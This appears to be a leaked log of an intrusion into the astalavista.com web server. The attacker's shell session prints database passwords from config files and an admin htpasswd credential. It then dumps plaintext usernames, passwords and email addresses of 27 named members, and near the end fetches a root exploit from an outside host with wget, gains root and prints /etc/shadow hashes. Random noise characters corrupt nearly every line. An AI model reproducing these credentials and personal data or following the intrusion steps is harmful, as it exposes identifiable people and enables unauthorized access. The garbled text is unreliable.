7 w$ d# k/ D8 J9 `, Z" E6 Qdrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com0 c* b$ U- B" L1 E+ {, u( i( H
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
9 W" x; D2 Z* I7 N& Z/ @drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner& f, [5 |4 _7 w) e& X% e. j% l- K
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg' V% S8 }- m6 u6 j: n( C
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
+ |! z h( L) k% |! Hdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron4 W7 n) `1 j6 t( U* q% _
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
& I l. U' C" T9 I9 O-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php* k: D% w/ _" _8 h
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
5 V7 n g- P; `+ V8 ?drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed& U3 L; y( Y y5 S- W
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
, U' C& E' z' B1 n0 P N, ?-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess2 J+ K; _1 w2 V0 V
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
6 O5 w3 j" i+ W! D' ~8 R) ]-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
2 ? U% J$ C# N-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
+ v7 a( `9 g" I. W-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php2 W0 m$ d( V" Z" H
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
5 E' G% c5 Z& s: W4 s: W-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
# ~* p. Y4 S# H; \- udrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc- N$ g$ Y9 l' ^ ]6 G' J: b
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang# d1 E. \7 _2 ~# v% s% G# m
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
8 b! \* Q5 c6 ^6 Q; ?8 ~% vdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
" S6 T" [( O% @% _" {drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
: y' |9 w' q1 L1 m# edrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata$ l; t3 x$ I* O6 Q3 S
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new2 C, ^! Z( Z7 n* T6 m; w% c4 B5 P
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
$ F! I4 U3 A" t; B5 E0 ~4 p" a1 ]drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re& K- A5 z0 }% X( G. G3 X8 H
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
2 |5 \/ J5 B% Idrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
4 r! X8 y' n v1 p- z; j: C- Kdrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
/ {9 n1 D0 `3 k$ e9 G, b# l& t$ b! wdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com D: y+ }. i7 l, G2 f" t" Q; ^0 z
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes6 ?' v, }4 }& U( U: O: |3 D' j
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
' L" {0 z- g# U/ @drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl* X1 Q3 Y7 V8 |! M, a
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
3 T8 ]0 v! }* l: u# J1 k! hdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old, v2 n9 P. V. v
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
7 X! v6 \4 @! q: {, G6 Cdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki' o1 K" U$ x$ E4 ?5 u
; S7 b- F+ {. [# A) E" Q1 ]2 S! ysh-3.2$ head -20 index.php
% c# ~. n# f% I/ `<?PHP# B5 @) Q/ r, V( a4 C9 @3 M' Y
/**$ {- Z) S0 a" Q4 G4 I! U( @
* Mainfile (external) for astalavistaNET v2.0
6 j8 f6 `5 v8 `*
& j w% c, S8 N& X o7 Z. _% V* @copyright Astalavista IT Engineering GmbH" o( @. ?8 C+ z
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>/ s1 H& e3 q; K0 H- G
* @version 1.0
6 E2 r! s' Y H$ ]*/8 E; s1 B; v4 u! G9 m6 Z
; [3 N* K$ y& N* |0 o+ f. I
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {1 X* E$ i+ H6 o0 g
$dontStartSession = false;/ V! [+ b0 f3 x1 ~0 C6 N, j" I8 X7 I
} else {$ f% K; }# Y- h5 P! T! m# A9 q- D
$dontStartSession = true;
- v: ]# z, x0 ]$ g- E }
% ]+ J( u. C* E4 V require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);6 D$ m8 Y: a4 Q" s
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);: Z+ {7 f8 a# r/ N
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
. u6 y: G, u* G, W; d5 ] require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);+ B1 L7 l- L+ s9 W" c
' A, ?5 H' Y$ M3 B: e
sh-3.2$ cd config8 s$ p6 L3 U4 F4 R* ]
sh-3.2$ ls -la" c: J) c# n+ m3 b
total 32 h4 S: I4 [7 a& x" B) B/ C' \, U9 v
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
9 |& y8 q* A6 Q3 p8 r O% Mdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
! m' E; O$ Z. ]8 X-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php% Q' k# R1 X" f% h: n
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php3 n, F) Y6 A: f
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php; T: w0 P- R# n
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php, D& l8 R+ e0 {# Q8 m; Q, Z8 z5 f3 J0 w
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php+ T+ t% Z! L4 u6 Y: \; @! x
3 I' b: B2 ~8 u' U$ @) z# Jsh-3.2$ cat com.conf.php' }# t- d, m9 x% D y
[snip]
2 S# Z, v' {) H) c9 p//member-database7 b+ G" _1 r1 ^
$_CONFIG['db_mem_server'] = ‘localhost’;4 S2 x5 W- T# u1 o8 s; _0 G
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
3 [$ l1 S$ ?' Z* t9 U& B y0 j$_CONFIG['db_mem_user'] = ‘astanet_db’;
$ U5 b" i3 j9 q6 s7 j- U; j$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;, ~* Q& O. ~( h4 ?% w
$_CONFIG['db_mem_debug'] = false; //true or false
4 ?& ]/ v4 b4 {: p& a& H* f1 I//ads-database
( x8 n$ u& C1 M! a2 a$_CONFIG['db_ads_server'] = ‘localhost’;
- _2 H! Z' n; `, {/ B' x$_CONFIG['db_ads_database'] = ‘astanet_ads’;; O9 f- N6 b1 x7 _+ r% }
$_CONFIG['db_ads_user'] = ‘astanet_db’;
) S5 |# V" e: i4 Z. _$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;1 ~' K8 A( z" h- R. d5 [6 z
$_CONFIG['db_ads_debug'] = false; //true or false& {. }8 z0 g) d0 ~% H$ B# G6 @$ [
//rainbow-database% Z9 X4 W' W, |8 ~4 U
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
# e" j; j( k7 b6 S# X% q; R$_CONFIG['db_rainbow_database'] = ‘rainbow’;7 H5 R `& j: c* [% {' G t
$_CONFIG['db_rainbow_user'] = ‘dinu’;
! [+ N+ d- L. R: ]$_CONFIG['db_rainbow_password'] = ‘dinudinu’;7 a' z6 K( U8 |: f
$_CONFIG['db_rainbow_debug'] = false; //true or false! U/ I S3 V% }( q. K
//mailing lists database4 [: s7 h7 r. k; ^# O
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;) C G% I* Q( x4 {0 U( Q; U
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;; A+ h' M! U6 }' Z& z( _0 ~6 n! Z
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;* x+ e9 y4 E5 c! ~
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
( W' `2 T* H0 @1 u$_CONFIG['db_mailing_lists_debug'] = false; //true or false
# I9 B$ {0 `+ C6 A# X//paypal8 F6 v% A3 K3 m; ?. _4 D& R
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;$ U5 I$ b7 j( Y
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
- g" S. q$ E# x4 h- ?$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;4 j7 a* U0 m. B4 h/ U) b3 P
$_CONFIG['sub_pp_noship'] = ‘1′;7 f! e' H) [/ p f1 ~
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;7 o) m6 F0 p" }7 `5 E
[snip]$ P; M, [ M5 d
, X x3 N! z( z. V6 y, d' l
sh-3.2$ cd ..3 _5 H8 s5 f+ T3 E
sh-3.2$ cd member; B! G& p9 _0 G3 w1 n+ z
sh-3.2$ ls -la
6 {4 E8 J9 y5 |6 N! i+ h. \total 20# r3 X2 k' c {
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .: N7 k! L' ]' T- S- K# H
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
+ f' Y3 I" `- Z0 [-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess; i% \4 Y6 D4 O) w2 y5 E
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
& c2 w, q$ ~0 e" d$ Msh-3.2$ cat .htaccess
3 R/ Q" G: a. u( wSecFilterEngine off
- m& E/ u6 t) B7 j
M6 p/ H% d6 msh-3.2$ cd ..+ K5 ]2 F# k) l7 g2 M8 u5 G ~
sh-3.2$ cd cron w2 i! M- z- r9 ~' X; E
sh-3.2$ ls -la# J$ U1 D* `: K2 H
total 168- A* |9 Z9 d: N
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
+ Q5 t1 D8 L7 C5 g9 e/ Adrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
: n5 h, x& f# \0 m; n# I7 N-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php5 w# y; `, ?1 A& o8 j
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php8 n$ c# V2 x& i( _
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php; k4 k( B' ? \% k/ Y) X
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
Y; o4 m8 x" ]% l& f9 [+ ?-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
& z1 ?" I" ]1 _4 X) t' L- w+ d-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php; r- z8 H* u. V& t7 I+ Z1 f! U
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php; D( Z3 Y/ g& g; j- ]3 l
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php" V7 u, w# p& q. \
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
- Y% \% n, o: y1 P: z* m% X6 v-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php8 H! p) B ]4 ~* |' T; Q& j' c6 R
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php4 u6 Y+ M. U! M% v2 X, L5 h+ u. x
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
5 u: Y- \/ }0 v1 a) l-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
]5 T N4 p' T! p' j* a' Y-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php& G" R. l; O* E6 E; [
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php( i% O9 \; y$ L2 T( k) q
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php9 E5 _4 D) `1 p7 q9 r6 e* r
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php. [7 @0 u- Z+ D6 z( \. q
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php5 I5 X3 G [) {6 {% F
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
" L. D) o- q) [) e8 Z-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
( ~' @8 P& t. y2 q" Y-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php: ~7 d% w- M3 u' G& U
+ D6 K3 r+ Y5 W, z& ysh-3.2$ cd ..
- G( F* C6 g" w5 Psh-3.2$ cd _007. F- U: n, m$ { i4 z
sh-3.2$ ls -la
0 e8 P7 l1 n$ v0 c6 V- y& O- Q" |8 etotal 24
/ M. S; h! P9 i% N" ?- X5 z. Ydrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .5 w* v/ Y5 o1 z- w5 q, |8 i
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..; n0 k; l n% Z* E h5 G
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess* c- r: Z; D# J
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php6 V# c/ N$ y/ x, g7 t$ v# S$ a8 x
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
( M: o# m9 b* edrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
+ W$ X% R3 r; k
4 B A+ M/ `5 Vsh-3.2$ cat .htaccess! o! H( _ i' U6 d
authType Basic7 p! U( l; E, _2 \! x' X
authName Admin+ a5 A1 \& P7 }2 G' n( s
authUserFile /home/astanet/auth/.htadm_pwd
8 f$ T/ A6 N* D; d7 n- _require valid-user
/ r) {5 I; O+ `. q. _0 w& O1 q0 Q6 F* {) y+ N1 ~! d
sh-3.2$ cat /home/astanet/auth/.htadm_pwd( m6 X( t7 T0 {9 _* s5 x" h4 [
admin2net:CR0bl65MwhfT
$ K; B$ L( F7 [9 \& E5 y/ P
2 j; N. r2 d7 U, Tsh-3.2$ mysql -u astanet_db -p
" L' i) X/ B8 b# N# u/ ^0 X" EEnter password:+ U; _, t9 l& Q( s5 n r
Welcome to the MySQL monitor. Commands end with ; or \g.
9 E$ f# D+ z K2 \1 MYour MySQL connection id is 2751538 v. u0 e( t5 n/ L8 v
Server version: 5.0.45-community-log MySQL Community Edition (GPL)& X6 R q& E& b" p! R
$ `5 r* r8 N0 h& q$ s" c
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
6 @. h% w* a1 r# f
) s8 V& G6 Q1 n8 L1 L8 G' l. lmysql> show databases;- ?) m$ G! j+ N" ~ f7 z
+———————–+) [- z0 w: c8 e8 J
| Database |5 \9 o% p, B2 V4 \( c0 w, J
+———————–+" _6 L. @9 b6 Q
| information_schema |1 o: @5 u9 Z( k8 d6 P1 ]) f$ G
| astanet_ads |3 Q u' G5 h* q/ O4 n9 f
| astanet_mailing_lists |
+ g, G1 O9 z! {! R, v3 W& `& G| astanet_mediawiki | C }. K1 n# ]; t u% O: \& G( u: ?
| astanet_membersystem |
/ u/ B/ \3 p, }2 ]* C1 l| test |4 z: [4 h0 D9 m" [3 g6 Y
+———————–+
; p; c& ?+ d. l6 rows in set (0.00 sec)
6 q% K0 @5 V" y% f- E
0 S+ a) l& E# s* @1 F. U* B/ ^mysql> use astanet_membersystem
5 O0 K3 o% R2 @Database changed
0 m( N/ m" x4 z c3 qmysql> show tables;: q4 T7 |5 c) ^0 w. X
+———————————–+ a& j% [. l0 O i
| Tables_in_astanet_membersystem |0 x) j) Z/ ], i+ y% k& v |2 C/ L
+———————————–+
# r; d: m) q4 G, E. W3 Q: [: k- Q| blacklist_categories |7 H. P, H% {, r8 p$ h& F7 C
| blacklist_content |
2 O5 Z7 B6 N1 H, s8 c2 v* L; a) w) M| blacklist_levels |8 s/ P6 N" U3 c
| blacklist_mcset |
; L. g8 w( }& L u2 m/ f' e0 W| dir_categories |" w& \7 t) J" \3 m# t( s ~
| dir_comments |
' P: D$ B6 ?" n" W| dir_links |
: t; _# @% f: O6 T6 S1 d| dir_temp |
! Y2 u7 t4 y6 v1 V| dir_votes |* _& G% t8 f4 r: U* ?" H
| documents |
( S- `: s, o& m' c* ^6 n. ?4 v| documents_categories |
: K; _5 H: @& r6 ~| email_content |4 P _, Z+ S1 Q' X
| email_settings |
) a; O+ [! h3 J* e0 B j| exploits |
' F; k* P* e1 ]2 b+ C, F( Q) J| exploits_categories |
* n9 }: P" _) {% ]) @| exploittree_categories |% X, L4 |8 g/ i8 ~/ B+ y
| exploittree_exploits |6 x# k1 v) B$ M' z, ]& ]; V+ d) X
| home_values |
- y* L7 l* I; q& w3 P% P; D& V| iso_countries |! _; w% }3 D' h" }
| links_categories |
$ ?! @8 c9 Y' |' h. z$ u& || links_records |) o2 K. O$ q7 q" g0 ?
| links_unauth |
; |$ @* l9 q7 e8 J( }| links_votes |
. k( w( w9 H+ I* u) }# h| log |, y1 C3 {% `$ W2 z) V3 C& D) |
| news_categories |, s( H7 {# ~: @/ @# W8 I9 ]5 O0 d) Z
| news_comments |: R" R" {' M7 E
| news_emoticons |* c6 B! }1 v' ?/ a
| news_latest |
: f! w- y: i# p- j9 \| news_messages |
: X9 h' n' k Q| news_statistics |
% `: X0 n" H' x. p4 i( `! x Z| news_votes |! E! h7 z2 k+ ] f
| prices_content |
6 U5 J a) e7 k" s5 @% a| prices_offers |( _; d7 X+ I% o6 c/ `+ ?7 h
| rss_settings |
. ^- l4 z+ K+ m G| sessions |
4 I/ @6 T2 e& g| stats_signups |! E3 G# F* {' e' F) ?1 N
| u2u2 |0 J3 E# w5 Y$ n. |5 l% ]
| u2u_contact |
6 b/ q2 l2 q* [0 ^; F, V| u2u_settings |
! g: T; T( G& q# w2 x: p| user_keywords_selected_categories |+ H$ r, c3 z2 _
| users |# ]- m8 u Y1 D8 a' s
| users_ipn_test | I! A# u9 s A5 D, l
| users_keyword_values |) Y( c- B0 G. v4 ?7 m
| users_profile |
8 k1 V3 d9 I, Z) T: k# [) N! `| users_temp |: {0 X9 ^3 `( \- o0 l" L4 W+ L
| users_upgrade |
) s. |8 U- J, i2 c! M5 S( o' I+———————————–+
; z9 l( ?* Q% n46 rows in set (0.00 sec)7 `9 @5 L4 }, @* `# E
B7 D' M: v" g- I* E( g
mysql> describe users;
3 J! g, l: s) t& M+————————–+————————————–+——+—–+———————+—————-+
9 y7 s; s1 p. d| Field | Type | Null | Key | Default | Extra |
4 R) Z' l7 h: u) j: d) ?9 {6 C$ p+————————–+————————————–+——+—–+———————+—————-+
" t; V$ v) @ d/ s! p8 s| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |; B9 t3 C8 a8 O0 z; A3 ?% |8 ?
| user | varchar(50) | NO | | | |+ k/ c% X8 u( [$ m$ X o/ @
| nickname | varchar(30) | NO | MUL | anonymous | |4 ^( i7 }- @0 o' p7 x) Z7 E
| password | varchar(30) | NO | | | |
6 E7 b* w& T! F% J; ?9 I( ]| userlevel | tinyint(3) | YES | MUL | NULL | |
: W, Q) F' l; v0 a a0 G7 P. G| exp | int(8) unsigned | NO | | 0 | |" h' R! N( x* S% i' L, ]
| email | varchar(50) | NO | | | |
9 K; c: I2 e; H+ K- k| ip | varchar(15) | NO | | 0 | |
2 Q: R1 v, u$ L3 ^& x4 v4 A' A| proxy | set(’0′,’1′) | NO | | 0 | |
7 g1 }, V1 S# V3 m| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
' {0 Y% ~' k) Y, D2 T3 I4 S| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |3 x G& |/ X, y6 M& d# P
| anz_in | tinyint(1) | NO | | -1 | |
0 A+ p( ~2 V W. A0 r# L| status | tinyint(1) unsigned | NO | | 0 | |4 j! s- }$ K8 ^7 z Q- {
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
7 s. W; v! M4 D| freemember | set(’0′,’1′) | NO | | 0 | |1 X& D! C. m7 P( a3 ]" V
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
- I- J/ j% c* y| lang | tinytext | NO | | | |
, z# F) d5 Z& D, `4 _8 B: C| adid | smallint(6) | NO | | 0 | |
# D F8 N+ j- o6 F| pp_txn_id | varchar(255) | YES | | NULL | |
' |# Y( ?+ V1 l3 m1 _9 _1 k| cnb_transaction_id | varchar(255) | YES | | NULL | |
$ E& e) p2 |' a8 |- c| cnb_order_id | varchar(255) | YES | | NULL | |
% Q1 q% i8 X: O| cnb_user_id | int(11) | YES | | 0 | |
7 f ]4 e3 @: j, u) B2 |. w+————————–+————————————–+——+—–+———————+—————-+
T" x+ o5 a/ ?" R! O1 R' k22 rows in set (0.01 sec)
5 `0 l8 n" u4 ~2 U8 e
* n( q1 {3 ~" H& }. n7 Tmysql> select count(*) as skids from users;
; b7 w( t, D+ ^+ c3 F/ U5 P* L, H l' h+——-+
8 { R8 ^. u# C T* v( P3 B| skids |. i1 E! s5 C% f E5 E0 _. [ v
+——-+0 W6 k5 R+ x( |7 h7 u
| 25199 |$ K, ], k' n4 k( i! F/ t
+——-+
" @4 z0 W+ k, t8 I; W: t0 Q1 row in set (0.00 sec)
7 B7 x9 ^4 I6 q3 |5 @6 e7 r0 v0 z B3 \" L* O" g
mysql> select user,nickname,password,email from users where userlevel = 1;# u" Z9 d" F8 k5 i6 ~( g# ~
+————————–+———————-+——————+———————————–+* k h3 V" q* S2 W* q/ |4 \- Y
| user | nickname | password | email |; u l1 a9 O, u! C% x% P5 r
+————————–+———————-+——————+———————————–+
6 J/ a. j9 Y2 N+ a" || pascal | prozac | astaman3 | 链接标记info@astalavista.net |
/ \3 p: y& t4 ~4 q0 p| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |& Z* N/ M: E7 c
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
2 z: y( F% t: K- S/ e# [| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
8 v) p4 i( J+ L j- ^- o# H% @| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
, f0 X: S7 } H! F$ ]( p: u* \& [| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
+ U) q2 N+ W7 ~| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |1 \+ V1 H4 W% J4 _9 W; s
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
! R' D: L. B1 o+ e4 m! e8 \- V| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |! y6 Z0 l" I$ ?+ X8 I
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |( A6 f3 N, S7 d0 p$ \
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
* G0 a1 f& w) j7 p| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |5 O& F* G) t* v ~/ _- O/ d
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |2 ^8 c( ^0 y7 m2 B g- B, K
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |2 b3 K9 W6 E5 w
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |" G7 t- l4 ^# s, C9 y8 ^3 b
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |, S4 b3 G% ?7 D& O
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
! y' b- |7 l5 M4 Q2 r" n| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
0 A1 `* m3 o$ y+ z| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
+ ]8 o _# ?* f) o| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |% X% W, g# t7 {/ t. q# f
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
2 a/ R) \; a5 m| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
3 R6 e$ I: h9 i4 @. i3 X% J: y| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
0 D5 U' }: S) }| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |$ _5 k2 F, Q$ M3 n
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |7 I# f ?- ]( k3 m7 u% H
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |* M' Z5 S: t( E4 |2 a2 R. w' b
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |- b# x$ \5 Z. ]7 W+ d9 _ Z ]
+————————–+———————-+——————+———————————–+: b: i# _' Z f5 N
27 rows in set (0.00 sec)
3 ^7 a# B& q% h7 d. |, M" y9 Z' E" R/ H ]9 r7 H
mysql> exit;/ y; |' |- G y; w. g8 r
Bye
1 u! }5 x- L4 d! p7 O1 B; Q
/ ?. F7 T; V9 y[~] plaintext passwords? yes,
4 u3 e& I6 j7 FThose so called “security professionals” who charge you $6.66 / month to
" a% J' g7 h% ` R1 E2 d! z: wregister at their hack-proof portal, save your passwords in plaintext…
9 {. n' R! m( J0 pbrilliant!
, j* W' R7 v6 A Q) }3 u& g- V, o$ T9 {& D, r/ ~0 y- {1 U; m
[~] This been fun but we want more.
0 s& Q T$ p' D/ V) }0 B6 i+ j/ `7 V( o
2 [! {8 U: o! J# C& gsh-3.2$ uname -a
! m3 @' U, U# I- P0 y' z0 fLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
% |9 _# E4 R% g0 Y U' Q4 wsh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]$ _' a8 w/ Y4 p
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]% I7 }* C8 y: I! k% z& H
Resolving anti.sec.labs… 13.33.33.374 F0 a. T0 @" A7 G
Connecting to anti.sec.labs|13.33.33.37|:80… connected.
% y+ I/ V& n! |! D& UHTTP request sent, awaiting response… 200 OK- C" N; w( z" p. d4 d
Length: 18200 (18K) [text/plain]
1 n9 \) c; U& m. ]' }' jSaving to: `g0troot’# X- A. [/ m& s# L
! X% c" O- O5 y8 B100%[=========================================================================================================================================>] 18,200 58.6K/s in5 U" q/ h/ _. ?, ?- M1 }8 C7 s2 r/ u
0.3s& e) V( u" A3 Q( G) D) m; q3 f
Z2 D4 z9 ?0 s8 i2 h7 ?" U7 t! A18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
. v% I0 g/ _5 s; p& @" q
8 |: \$ Y. r; d' z |5 I1 l) ush-3.2$ ./g0troot -i x86_64 i0 u% D/ n- j9 h
[+] g0troot - anti.sec.labs( R! I Y8 O U$ }& W
[+] Target: 2.6.18-128.1.10.el5
" k. d/ Q+ w- }/ B. Y: O[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
0 h; H5 |. Q+ o* ?, _8 c: \1 y
7 G6 P- ?1 ]! q3 w: Z, W[+] r00tr00t9 n7 \; ?9 B! i$ K7 ]1 m7 M
[~] Executing shell…
& K" Q% v7 q7 n5 @4 j0 L
- m1 P2 e" v1 Y0 v) L: W6 m; j+ Fsh-3.2# id, ]1 y+ p0 l+ C4 m
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)' @) E6 Z2 \6 ]! `9 ~( L, u& y
- m% A% E8 R' \- c- j1 x# U7 `
sh-3.2# cat /etc/shadow
6 s; K3 p% Q3 Froot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
' w$ ]0 x( K* G4 q+ f[snip]' b8 g/ G0 F0 B# c- D [5 B
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
7 _+ Y9 K2 f7 `5 Z' F( V1 ojon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
' X8 { `- B0 a; s% R& y$ Ncom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
F5 _5 l" c( \( E, ?1 wastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::! Y- E$ y1 I7 ~* B
' F: l& k) p) J, X$ |- X
